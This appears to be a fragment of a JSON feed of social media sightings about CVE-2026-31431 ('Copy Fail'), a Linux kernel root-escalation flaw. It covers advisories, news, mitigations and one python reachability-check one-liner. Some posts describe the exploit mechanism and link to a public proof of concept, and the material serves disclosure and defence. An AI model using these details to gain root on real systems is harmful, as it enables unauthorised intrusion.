Fail\u300d\u30ed\u30b8\u30c3\u30af\u6b20\u9665\u304c\u30b7\u30b9\u30c6\u30e0\u4e57\u3063\u53d6\u308a\u3092\u53ef\u80fd\u306b\u3059\u308b\n\nLinux\u30ab\u30fc\u30cd\u30eb\u306e\u9ad8\u91cd\u5ea6\u30ed\u30b8\u30c3\u30af\u30d0\u30b0\u306b\u3088\u308a\u3001\u6a29\u9650\u306e\u306a\u3044\u653b\u6483\u8005\u304c\u4ed6\u306e\u30d5\u30a1\u30a4\u30eb\u306e\u30e1\u30e2\u30ea\u306b\u30b3\u30fc\u30c9\u3092\u66f8\u304d\u8fbc\u3093\u3067root\u30b7\u30a7\u30eb\u3092\u53d6\u5f97\u3067\u304d\u308b\u3068\u30b5\u30a4\u30d0\u30fc\u30bb\u30ad\u30e5\u30ea\u30c6\u30a3\u4f01\u696dTheori\u304c\u5831\u544a\u3057\u3066\u3044\u307e\u3059\u3002 CVE-2026-31431\uff08CSS\u30b9\u30b3\u30a27.8\uff09\u3068\u3057\u3066\u8ffd\u8de1\u3055\u308c\u3001Copy Fail\u3068\u547c\u3070\u308c\u308b\u3053\u306e\u554f\u984c\u306f\u30012017\u5e74\u4ee5\u964d\u306e\u3059\u3079\u3066", "creation_timestamp": "2026-04-30T10:17:31.438988Z"}, {"uuid": "4c0e5339-bd39-44bb-83c5-a662e6f61d16", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/r-blueteamsec.bsky.social/post/3mkpfjfo7dj2b", "content": "CVE-2026-31431 (Copy Fail) detection toolkit \u2014 auditd, eBPF, Sigma, YARA", "creation_timestamp": "2026-04-30T10:24:32.420194Z"}, {"uuid": "462bf239-cb9b-4fa0-a6a6-38d4aab94afd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "cve-2026-31431", "type": "seen", "source": "https://bsky.app/profile/Atirut.toot.community.ap.brid.gy/post/3mkpfmr4vdq22", "content": "PSA for sysadmins: https://master.almalinux-org.pages.dev/blog/2026-04-30-cve-2026-31431-copy-fail/\n\nTL;DR anyone with an unpriviledged shell can become root with a small exploit. One mean fucker, so be sure to update ASAP once available if you're within blast radius.\n\n#sysadmin #Linux #psa #cve", "creation_timestamp": "2026-04-30T10:26:30.628454Z"}, {"uuid": "aa4dbe63-f37a-4367-90b3-3755ff3280c4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/me.social.k3can.us.ap.brid.gy/post/3mkpgawanojw2", "content": "CVE-2026-31431. A logic flaw in `authencesn` appears to enable privilege escalation on nearly every #Linux distro between 2017 and now.\n\n#CopyFail \u2014 CVE-2026-31431\nhttps://copy.fail/\n\nhttps://github.com/theori-io/copy-fail-CVE-2026-31431/issues", "creation_timestamp": "2026-04-30T10:37:48.891785Z"}, {"uuid": "a38f084c-b0e8-4af8-9434-15baed1c10bc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://infosec.exchange/users/cert_eu/statuses/116492956743147474", "content": "High Vulnerability in the Linux Kernel (\"Copy Fail\") (CERT-EU Security Advisory 2026-005)\nOn 29 April 2026, a high local privilege escalation vulnerability in the Linux kernel, tracked as CVE-2026-31431 and named \"Copy Fail\", was publicly disclosed.\nThe vulnerability affects every mainstream Linux distributions shipping a kernel built since 2017. A public proof-of-concept exploit has been released.As of the date of this advisory, no distribution has shipped a fixed kernel package. The mainline fix was committed on 1 April 2026, but vendor updates are still pending across all major distributions. \nCERT-EU strongly recommends applying the interim mitigation immediately, prioritising Kubernetes nodes, and CI/CD runners exposed to untrusted workloads.\nhttps://www.cert.europa.eu/publications/security-advisories/2026-005/", "creation_timestamp": "2026-04-30T09:30:55.246235Z"}, {"uuid": "256a183d-3053-4c12-9052-bfb3a9dadd2a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/securityrss.bsky.social/post/3mkpcnuzk3e2q", "content": "A local privilege escalation vulnerability in the Linux kernel, dubbed Copy Fail (CVE-2026-31431), allows unprivileged users to gain root access by modifying the page cache of readable files. This flaw affects major Linux distributions, including Debian, Ubuntu, and SUSE, which have issued patches.", "creation_timestamp": "2026-04-30T09:33:22.106362Z"}, {"uuid": "858d1fb3-37e2-47fc-9fb9-a3d9df425934", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/2rZiKKbOU3nTafniR2qMMSE0gwZ.activitypub.awakari.com.ap.brid.gy/post/3mkpcsszf2me2", "content": "New Linux 'Copy Fail' Vulnerability Enables Root Access on Major Distributions TheHackerNews CVE-2026-31431 CVSS 7.8 flaw since 2017 enables root via 732-byte exploit, impacting major Linux...\n\n#Security #News\n\nOrigin | Interest | Match", "creation_timestamp": "2026-04-30T09:40:22.366285Z"}, {"uuid": "64b969d9-58df-4aa4-9f79-5720d2aafc59", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "cve-2026-31431", "type": "seen", "source": "https://social.tchncs.de/users/gborn/statuses/116493037293455809", "content": "Wer ein Linux betreibt, auf dem viele Nutzer ein Konto haben, sollte bzgl. der #CopyFail Schwachstelle CVE-2026-31431 reagieren.\nhttps://borncity.com/blog/2026/04/30/linux-schwachstelle-copy-fail-cve-2026-31431-erlaubt-rooting/", "creation_timestamp": "2026-04-30T09:51:24.479831Z"}, {"uuid": "341728e2-48d4-44dd-a5b4-570e3209606a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/etguenni.bsky.social/post/3mkpdojsvj22l", "content": "Wer ein Linux betreibt, auf dem viele Nutzer ein Konto haben, sollte bzgl. der #CopyFail Schwachstelle CVE-2026-31431 reagieren.\n\nborncity.com/blog/2026/04...", "creation_timestamp": "2026-04-30T09:51:42.469127Z"}, {"uuid": "6d7f3482-874b-4bf0-b89c-096b01a74a4c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "cve-2026-31431", "type": "seen", "source": "https://bsky.app/profile/pbloem.sigmoid.social.ap.brid.gy/post/3mkpdvdrqk7q2", "content": "So, copy.fail was found with one hour of AI assistance, and would (according to this article) have earned $500K on the open market not too long ago.\n\nhttps://www.bugcrowd.com/blog/what-we-know-about-copy-fail-cve-2026-31431/\n\nI'm no security researcher, but this kind of contradicts all those [\u2026]", "creation_timestamp": "2026-04-30T09:55:34.222493Z"}, {"uuid": "7df0219e-8b41-42c2-ac6f-7cba7769e307", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://infosec.exchange/users/decio/statuses/116493067934486304", "content": "[VULN] \u26a0\ufe0f\"Copy Fail - Une IA trouve la faille Linux que personne n'a vue\"\" * Copy Fail (CVE-2026-31431) est une faille Linux qui permet de passer de simple utilisateur \u00e0 root en 732 octets, affectant la quasi-totalit\u00e9 des kernels non patch\u00e9s depuis 2017, d\u00e9couverte par une IA en une heure.\n\nLa faille exploite une optimisation de 2017 dans le sous-syst\u00e8me crypto qui laisse un fichier en lecture seule accessible en zone modifiable, permettant de modifier progressivement un binaire syst\u00e8me via l'appel splice().\nDeux solutions de protection existent : patcher le kernel via la distro ou d\u00e9sactiver le module algif_aead (ou bloquer le sous-syst\u00e8me crypto via seccomp si le module est int\u00e9gr\u00e9 en dur).\"\ud83d\udc47 https://korben.info/copy-fail-faille-kernel-linux-decouverte-ia.html\nDemo / exploit ( via @bortzmeyer  )\ud83d\udc47 https://www.bortzmeyer.org/copyfail.html\n\ud83d\udd0d \u2b07\ufe0f https://vulnerability.circl.lu/vuln/CVE-2026-31431\n\ud83d\udcac \u2b07\ufe0f https://infosec.pub/post/45735124\n#CyberVeille  #CVE_2026_31431", "creation_timestamp": "2026-04-30T09:59:11.467521Z"}, {"uuid": "0a31b12d-0d9e-41e3-81a6-23e34aeaa48a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/echobit.de/post/3mkpkcqm44c2n", "content": "Aktuell kursieren Meldungen zur Linux-Schwachstelle CVE-2026-31431 (\u201eCopy Fail\u201c). Die Darstellung wirkt teils sehr alarmistisch \u2013 deshalb kurz die Einordnung:\n\nJa, es handelt sich um eine echte Sicherheitsl\u00fccke im Kernel (betreffend u. a. das algif_aead-Modul).", "creation_timestamp": "2026-04-30T11:50:18.121733Z"}, {"uuid": "e366ed11-f7bc-46f9-ab24-5fdc5a9d797c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/helpnetsecurity.com/post/3mkpkefy2fs2y", "content": "Nine-year-old Linux kernel flaw enables reliable local privilege escalation (CVE-2026-31431)\n\n\ud83d\udcd6 Read more: www.helpnetsecurity.com/2026/04/30/c...\n\n#cybersecurity #cybersecuritynews #containers #PoC #Linux", "creation_timestamp": "2026-04-30T11:51:17.075644Z"}, {"uuid": "45632110-59ac-4faa-a811-d6e35576b9cb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/kirik.bsky.social/post/3mkpkr3reok24", "content": "\u7c21\u6f54\u304b\u3064\u4e0d\u53ef\u6b20\u306a\u3053\u3068\u306f\u5168\u90e8\u3053\u3053\u306b\u66f8\u3044\u3066\u3042\u308b\u304b\u3089\u307f\u3093\u306a\u8aad\u3093\u3067\u5373\u5bfe\u51e6\u3057\u307e\u3057\u3087\u3046\n\n\u300cCopy Fail\u300dCVE-2026-31431 \u2014 9\u5e74\u9593\u6f5c\u3093\u3067\u3044\u305f732\u30d0\u30a4\u30c8Python\u3067Linux\u304croot\u5316\u3055\u308c\u308b\u8106\u5f31\u6027\u3068\u5bfe\u7b56\uff5czephel01 @zephel01 \n\nnote.com/zephel01/n/n...", "creation_timestamp": "2026-04-30T11:58:33.055023Z"}, {"uuid": "daa5195a-86d3-46d9-85d0-b386f4d5895e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/dougburks.bsky.social/post/3mkpksiwfvc2s", "content": "OhMyDebn 3.6.3 now available with Copy Fail CVE-2026-31431 exploit mitigation, OpenCode 1.14.30, and Aether 4.15.3!\n\nOhMyDebn is a debonair Linux desktop for power users. It gives you the stability of the Debian distro, the ease of use of the Cinnamon desktop, and the power of AI.", "creation_timestamp": "2026-04-30T11:59:09.244299Z"}, {"uuid": "9f97691f-a395-49db-b339-567c92c07a1f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/adriend.linuxtricks.fr/post/3mkplfrh76k2x", "content": "Lundi, je vous disais : le 4 mai, on optimise Linux ( en mode serveur). Debian, Ubuntu ou RedHat (et clones) installent trop de services par d\u00e9faut souvent inutiles. \n\nLa CVE-2026-31431 (Copy Fail) va rendre ce live int\u00e9ressant !\n\nRDV Lundi 20h : twitch.tv/adrienLinuxt...", "creation_timestamp": "2026-04-30T12:09:58.542805Z"}, {"uuid": "344d757f-c97f-446a-8cf7-120fb5d81869", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/koki.me/post/3mkplmw6em52c", "content": "Codize Sandbox v0.11.0 \u30ea\u30ea\u30fc\u30b9\nCopy Fail (CVE-2026-31431) \u5bfe\u7b56\u3068\u3057\u3066 AF_ALG \u3075\u3055\u3044\u3069\u3044\u305f\ngithub.com/codize-dev/s...", "creation_timestamp": "2026-04-30T12:13:53.065515Z"}, {"uuid": "f4568781-c982-424b-b4e0-4e61157ede73", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/linux.activitypub.awakari.com.ap.brid.gy/post/3mkpnvt6mi3m2", "content": "CopyFail CVE-2026-31431 mitigation with open source tool In the link I explain: 1) Very shortly and easy to understand what is this new vulnerability 2) How I use owLSM which is a open-source Linux...\n\n\nOrigin | Interest | Match", "creation_timestamp": "2026-04-30T12:54:48.349929Z"}, {"uuid": "95e14702-5895-498f-9238-a773fa7a7d65", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/justgeekfr.bsky.social/post/3mkpoabxvbc2p", "content": "\ud83d\udea8 Copy Fail (CVE-2026-31431) : la faille Linux qui dormait depuis 9 ans\n\n\ud83d\udc49 www.justgeek.fr/copy-fail-cv...\n\n#Linux #Cybers\u00e9curit\u00e9 #CopyFail #S\u00e9curit\u00e9 #Kernel #Vuln\u00e9rabilit\u00e9", "creation_timestamp": "2026-04-30T13:00:31.969660Z"}, {"uuid": "602750fc-4226-46eb-ba31-8ae7d7293fbe", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "cve-2026-31431", "type": "seen", "source": "https://bsky.app/profile/linux.activitypub.awakari.com.ap.brid.gy/post/3mkpqwjz55n22", "content": "[Copy Fail] The same 732-byte Python script roots every Linux distribution shipped since 2017. https://copy.fail/ Commentaires : voir le flux Atom ouvrir dans le navigateur\n\n#cve #cybers\u00e9curit\u00e9 #kernel #linux #cve-2026-31431\n\nOrigin | Interest | Match", "creation_timestamp": "2026-04-30T13:48:46.788547Z"}, {"uuid": "c75d0467-44d0-42a3-a63d-4bd852152809", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/techimo.bsky.social/post/3mkpj7jyqhu22", "content": "Linux kernel \"Copy Fail\" (CVE-2026-31431) vulnerability found! Unprivileged local users can write 4 bytes to file page cache. Exploit: python script alters setuid binaries for root access. Also affects containers. Fix: Revert 2017 optimization. Source: xint.io", "creation_timestamp": "2026-04-30T11:30:36.711223Z"}, {"uuid": "291a2775-e8aa-44a6-8a27-819cab5198ee", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/hnws.bsky.social/post/3mkpjirtdvh22", "content": "Copy-fail-destroyer: K8s remediation for CVE-2026-31431\nL: https://github.com/NorskHelsenett/copy-fail-destroyer\nC: https://news.ycombinator.com/item?id=47960232\nposted on 2026.04.30 at 05:49:59 (c=0, p=4)", "creation_timestamp": "2026-04-30T11:35:47.032738Z"}, {"uuid": "e7842974-7a3d-42b3-8e7a-097bcfdcaa0a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/news.karthihegde.dev/post/3mkpjjqwgwj2h", "content": "Copy-fail-destroyer: K8s remediation for CVE-2026-31431\nDiscussion | hackernews | Author: evenh", "creation_timestamp": "2026-04-30T11:36:19.452406Z"}, {"uuid": "f408f387-966a-4bda-929d-8c99ce1932c4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/jianmin.defcon.social.ap.brid.gy/post/3mkpvvr6mcyv2", "content": "python3 -c 'import socket; s=socket.socket(socket.AF_ALG, socket.SOCK_SEQPACKET, 0); s.bind((\"aead\",\"authencesn(hmac(sha256),cbc(aes))\")); print(\"REACHABLE\")' 2>&1\n\nIf you see: \"file not found\" then you're probably not vulnerable to copy.fail (#CVE-2026-31431 #copyfail)\n\nIf you see \"REACHABLE,\" [\u2026]", "creation_timestamp": "2026-04-30T15:17:57.982071Z"}, {"uuid": "e4ed8f56-5a49-4633-ac36-c2466ca8a03a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/blackhatnews.tokyo/post/3mkpvzmhj332v", "content": "CVE-2026-31431: \u300cCopy Fail\u300dLinux \u30ab\u30fc\u30cd\u30eb\u306e\u8106\u5f31\u6027\u306b\u3088\u308a\u30ed\u30fc\u30ab\u30eb\u30e6\u30fc\u30b6\u30fc\u304c\u6570\u79d2\u3067 root\u00a0\u6a29\u9650\u3092\u53d6\u5f97\u53ef\u80fd\n\n\u8105\u5a01\u7814\u7a76\u30c7\u30a3\u30ec\u30af\u30bf\u30fc2026\u5e744\u670829\u65e5\u3001Linux \u30ab\u30fc\u30cd\u30eb\u306e algif_aead \u30e6\u30fc\u30b6\u30fc\u30b9\u30da\u30fc\u30b9\u6697\u53f7\u30a4\u30f3\u30bf\u30fc\u30d5\u30a7\u30fc\u30b9\u3067\u3001\u300cCopy Fail\u300d\u3068\u547c\u3070\u308c\u308b CVE-2026-31431\uff08CVSS 7.8 HIGH\uff09\u304c\u958b\u793a\u3055\u308c\u307e\u3057\u305f\u3002Theori \u306e\u7814\u7a76\u8005\u3089\u306f\u3001\u6a29\u9650\u306e\u306a\u3044\u30ed\u30fc\u30ab\u30eb\u30e6\u30fc\u30b6\u30fc\u304c setuid \u30d0\u30a4\u30ca\u30ea", "creation_timestamp": "2026-04-30T15:19:56.215430Z"}, {"uuid": "d396c0e7-d547-4666-a23d-279b7819b5a5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/kicksecure.com/post/3mkpwmeattb24", "content": "copy.fail / CVE-2026-31431: Linux kernel local privilege escalation.\n\nUpdate kernels when fixes land, then reboot.\n\nHelp wanted: reduce SUID attack surface upstream. If you don\u2019t help, it probably won\u2019t happen.\n\nforums.kicksecure.co...\n", "creation_timestamp": "2026-04-30T15:30:25.815649Z"}, {"uuid": "edbe8332-b265-46e4-b249-e84463cb1881", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/hatena-bookmark.bsky.social/post/3mkprbvluak2y", "content": "#\ud83d\udd16\u30c6\u30af\u30ce\u30ed\u30b8\u30fc\nLinux\u30ab\u30fc\u30cd\u30eb\u306e\u8106\u5f31\u6027\u300cCopyFail (CVE-2026-31431)\u300d\u3092EC2\u306eUbuntu 22.04\u3067\u5b9f\u8a3c\u3057\u3066\u307f\u305f\n\n\u3053\u3093\u306b\u3061\u306f\uff01\u682a\u5f0f\u4f1a\u793e\u30a8\u30fc\u30a2\u30a4\u30bb\u30ad\u30e5\u30ea\u30c6\u30a3\u30e9\u30dc\u306e\u306f\u308b\u3077\u3068\u7533\u3057\u307e\u3059\u3002 \u4e00\u822c\u30e6\u30fc\u30b6\u30fc\u304c\u30b3\u30de\u30f3\u30c9\u4e00\u767a\u3067root\u3092\u53d6\u308c\u3066\u3057\u307e\u3046Linux\u30ab\u30fc\u30cd\u30eb\u306e\u8106\u5f31\u6027\u3001CopyFail (CVE-2026-31431) \u304c\u8a71\u984c\u306b\u306a\u3063\u3066\u3044\u307e\u3059\u3002AI\u306b\u3088\u3063\u3066\u767a\u898b\u3055\u308c\u305f\u8ad6\u7406\u30d0\u30b0\u3067\u3001\u6c5a\u3057\u3066\u3082\u554f\u984c\u306a\u3044EC2\u74b0\u5883\u3092\u4f5c\u3063\u3066\u5b9f\u969b\u306b\u691c\u8a3c\u3057\u3066\u307f\u307e\u3057\u305f\u3002 \u3053\u306e\u8106\u5f31\u6027\u306f\u3001 \u4e00\u822c\u30e6\u30fc\u30b6\u30fc...\nhttps://zenn.dev/aeyesec/articles/7e4a1e3c83e81b", "creation_timestamp": "2026-04-30T13:55:06.460589Z"}, {"uuid": "f0662d21-6785-4578-99d7-2784bb9b8a55", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/linux.activitypub.awakari.com.ap.brid.gy/post/3mkpscgvlons2", "content": "Copy Fail : cette redoutable faille Linux permet d\u2019obtenir un acc\u00e8s root Copy Fail (CVE-2026-31431), c'est le nom de la faille critique d\u00e9couverte dans le noyau Linux. Elle offre un acc\u00e8s ...\n\n#Actu #Cybers\u00e9curit\u00e9 #Cybers\u00e9curit\u00e9 #Linux #Vuln\u00e9rabilit\u00e9\n\nOrigin | Interest | Match", "creation_timestamp": "2026-04-30T14:13:19.520812Z"}, {"uuid": "5d264563-98cf-420a-ab87-3713d274b36b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "cve-2026-31431", "type": "seen", "source": "https://bsky.app/profile/ahmandonk.bsky.social/post/3mkpsomr4q52i", "content": "\ud83d\udcf0 Celah Linux Baru 'Copy Fail' Beri Peretas Akses Root di Berbagai Distro Utama\n\n\ud83d\udc49 Baca artikel lengkap di sini: https://ahmandonk.com/2026/04/30/celah-linux-baru-copy-fail-beri-peretas-akses-root-di-berbagai-distro/\n\n#ahmandonkTechNews #beritaTeknologi #copyFail #cve-2026-31431 #dirtyPipe #ek", "creation_timestamp": "2026-04-30T14:20:06.563931Z"}, {"uuid": "19bcc0de-7ba9-4889-b6dd-c7bf1e98c448", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/undercodenews.bsky.social/post/3mkpsor4axd2k", "content": "Copy Fail Linux Root Exploit Released: Critical Kernel Bug Lets Local Users Gain Full\u00a0Control\n\nIntroduction A newly disclosed Linux privilege escalation vulnerability named Copy Fail is drawing serious attention across the cybersecurity world. Tracked as CVE-2026-31431, the flaw affects Linux\u2026", "creation_timestamp": "2026-04-30T14:20:11.085320Z"}, {"uuid": "db590968-3557-46f7-a1eb-751d696c07ea", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://social.circl.lu/users/circl/statuses/116494107330904168", "content": "CVE-2026-31431 - crypto: algif_aead - Revert to operating out-of-place\n\ud83d\udd17 https://vulnerability.circl.lu/vuln/CVE-2026-31431#comments", "creation_timestamp": "2026-04-30T14:23:31.090186Z"}, {"uuid": "c5ee1a2e-15c8-4e11-ac36-2be2b169da05", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://mastodon.social/ap/users/115426718704364579/statuses/116494202989973801", "content": "\ud83d\udcf0 Critical 'Copy Fail' Linux Flaw (CVE-2026-31431) Gives Instant Root on Major Distros\n\u26a0\ufe0f Critical 'Copy Fail' Linux flaw (CVE-2026-31431) allows any local user to get instant root access! Affects distros since 2017 like Ubuntu, Debian, RHEL. A simple, reliable exploit exists. Patch now! #Linux #CyberSecurity #LPE\n\ud83d\udd17 https://cyber.netsecops.io", "creation_timestamp": "2026-04-30T14:47:51.520795Z"}, {"uuid": "79c84a3b-d8f5-4773-a2b0-fc05394273b7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/ineumann.fr/post/3mkpxywbres24", "content": "Elle est m\u00e9ga chaude la CVE-2026-31431, surpris que \u00e7a fasse pas au moins autant de bruit que xzutils ou log4j gitlab.cwcloud.tech/oss/cve-2026... surtout que les patchs sont pas ouf encore", "creation_timestamp": "2026-04-30T15:55:23.597998Z"}, {"uuid": "c17ad11e-90ff-412a-b126-496ab4e1eae6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/fschmidt.bsky.social/post/3mkpx3dh6rk2x", "content": "CVE-2026-31431 (Kollegen haben es schon gefixt.)", "creation_timestamp": "2026-04-30T15:38:47.760981Z"}, {"uuid": "7f4b0809-23fc-4fc6-82bb-203d5612c94b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/hendryadrian.bsky.social/post/3mkpxh6nhik2q", "content": "The \u201cCopy Fail\u201d flaw (CVE-2026-31431) allows local attackers to gain root access on Linux kernels since 2017 via a controlled 4-byte write to page cache using AF_ALG and splice. #LinuxKernel #LocalExploit #USA", "creation_timestamp": "2026-04-30T15:45:25.883286Z"}, {"uuid": "66d8f06f-0c71-4c73-8f66-ef8f645a4ec7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "cve-2026-31431", "type": "seen", "source": "https://bsky.app/profile/samuelvermeulenpro.bsky.social/post/3mkpxhueple2z", "content": "#ActuLibre - Copy Fail (CVE-2026-31431) : d\u00e9tecter, corriger, comprendre \u00e0 lire sur\nhttps://loud-technology.com/insight/copy-fail-cve-2026-31431-faille-kernel-linux/", "creation_timestamp": "2026-04-30T15:45:48.344187Z"}, {"uuid": "672dd42a-b655-4303-ac37-551c7ce6c40f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/linux.activitypub.awakari.com.ap.brid.gy/post/3mkpxq37ox2j2", "content": "CVE-2026-31431: \u201cCopy Fail\u201d Linux kernel flaw lets local users gain root in seconds\n\n\nOrigin | Interest | Match", "creation_timestamp": "2026-04-30T15:50:27.053718Z"}, {"uuid": "7d12b601-d455-4dfa-a51c-d77423715cdf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/bellmore.bsky.social/post/3mkpyftxtk22v", "content": "Nerd friends:\n\nYesterday, CVE-2026-31431 (\"Copy Fail\") was publicly disclosed. This exploit allows an unprivileged shell user on a Linux system to gain root access with a simple 10-line Python script. The mechanisms for the exploit can be found at copy.fail.\n\nPlease patch your systems ASAP!\n#Infosec", "creation_timestamp": "2026-04-30T16:02:34.151393Z"}, {"uuid": "d84f14f2-85a0-438b-a814-c6309bda6827", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/2rZiKKbOU3nTafniR2qMMSE0gwZ.activitypub.awakari.com.ap.brid.gy/post/3mkpyn2ctmpy2", "content": "Copy Fail (CVE-2026-31431): Frequently asked questions about Linux kernel privilege escalation vulnerability A flaw in the Linux kernel present since 2017 allows a local user to gain root access on...\n\n\nOrigin | Interest | Match", "creation_timestamp": "2026-04-30T16:06:38.980933Z"}, {"uuid": "1a784a25-e75a-4a64-b9a2-a02b6b03b35d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", 